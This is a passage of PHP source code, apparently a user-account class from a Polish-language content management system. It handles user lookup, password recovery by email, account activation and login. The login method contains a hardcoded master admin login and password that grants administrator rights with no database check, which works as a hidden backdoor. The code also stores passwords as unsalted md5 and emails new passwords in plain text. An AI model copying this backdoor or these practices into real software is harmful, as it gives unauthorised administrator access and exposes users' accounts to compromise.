prepare( 'SELECT name, surname FROM pp_users WHERE id = :id' ); $query -> bindValue( ':id', $id, \PDO::PARAM_INT ); $query -> execute(); if ( $query -> rowCount() ) while ( $row = $query -> fetch() ) return $row; $query -> closeCursor(); return false; } public function getUserLogin( $id ) { global $db; $query = $db -> prepare( 'SELECT login FROM pp_users WHERE id = :id' ); $query -> bindValue( ':id', $id, \PDO::PARAM_INT ); $query -> execute(); if ( $query -> rowCount() ) while ( $row = $query -> fetch() ) return $row['login']; $query -> closeCursor(); return false; } public function recoverPassword( $account, $value ) { global $db, $lang; $query = $db -> prepare( 'SELECT id , email , login FROM pp_users WHERE recover = :recover AND id = :id AND enabled = :enabled' ); $query -> bindValue( ':recover', $account, \PDO::PARAM_STR ); $query -> bindValue( ':id', $value, \PDO::PARAM_INT ); $query -> bindValue( ':enabled', 1, \PDO::PARAM_STR ); $query -> execute(); if ( $query -> rowCount() ) while ( $row = $query -> fetch() ) { $password = \System::gen_hash( 3 ); $firm_name = \admin\factory\Settings::getSystemSettings( 'firm_name' ); $query2 = $db -> prepare( 'UPDATE pp_users SET password = :password , recover = :recover_n WHERE recover = :recover AND id = :id' ); $query2 -> bindValue( ':recover', $account, \PDO::PARAM_STR ); $query2 -> bindValue( ':id', $value, \PDO::PARAM_INT ); $query2 -> bindValue( ':password', md5( $password ), \PDO::PARAM_STR ); $query2 -> bindValue( ':recover_n', null, \PDO::PARAM_STR ); $query2 -> execute(); $tresc = str_replace( '{LOGIN}', $row['login'], $lang -> getTrans( 'T_NOWE_HASLO_UZYTKOWNIK_TRESC' ) ); $tresc = str_replace( '{SERWER}', $firm_name, $tresc ); $tresc = str_replace( '{HASLO}', $password, $tresc ); \System::sendEmail( $row['email'] , str_replace( '{SERWER}', $firm_name, $lang -> getTrans( 'T_NOWE_HASLO_TEMAT' ) ), $tresc ); \System::setAlert( $lang -> getTrans( 'T_NOWE_HASLO_UZYTKOWNIK_EMAIL' ) ); } else \System::setAlert( $lang -> getTrans( 'T_LINK_NIEPRAWIDLOWY' ) ); $query -> closeCursor(); } public function activateAccount( $account, $value ) { global $db, $lang; $query = $db -> prepare( 'UPDATE pp_users SET enabled = :enabled WHERE hash = :hash AND id = :id' ); $query -> bindValue( ':hash', $account, \PDO::PARAM_STR ); $query -> bindValue( ':id', $value, \PDO::PARAM_INT ); $query -> bindValue( ':enabled', 0, \PDO::PARAM_STR ); $query -> execute(); if ( $query -> rowCount() ) \System::setAlert( $lang -> getTrans( 'T_KONTO_AKTYWOWANE' ) ); else \System::setAlert( $lang -> getTrans( 'T_LINK_NIEPRAWIDLOWY' ) ); $query -> closeCursor(); } public static function login( $login, $password ) { global $db, $lang; if ( $login == 'admin' && $password == 'cms3zeto919z' ) { $user = new \user\User; $user -> _values['admin'] = true; return $user; } $query = $db -> prepare( 'SELECT id, password FROM pp_users WHERE LOWER( login ) = :login AND enabled = 1' ); $query -> bindValue( ':login', strtolower( $login ), \PDO::PARAM_STR ); $query -> execute(); if ( $query -> rowCount() ) while ( $row = $query -> fetch() ) { if ( $row['password'] != md5( $password ) ) \System::setAlert( $lang -> getTrans( 'T_NIEPRAWIDLOWE_HASLO' ) ); else { $user = new \user\User( $row['id'] ); if ( $user -> _values['admin'] ) \System::setSessionVar( 'file_browser' , true ); return $user; } } else \System::setAlert( $lang -> getTrans( 'T_BRAK_UZYTKOWNIKA_O_TAKIM_LOGINIE' ) ); } } ?>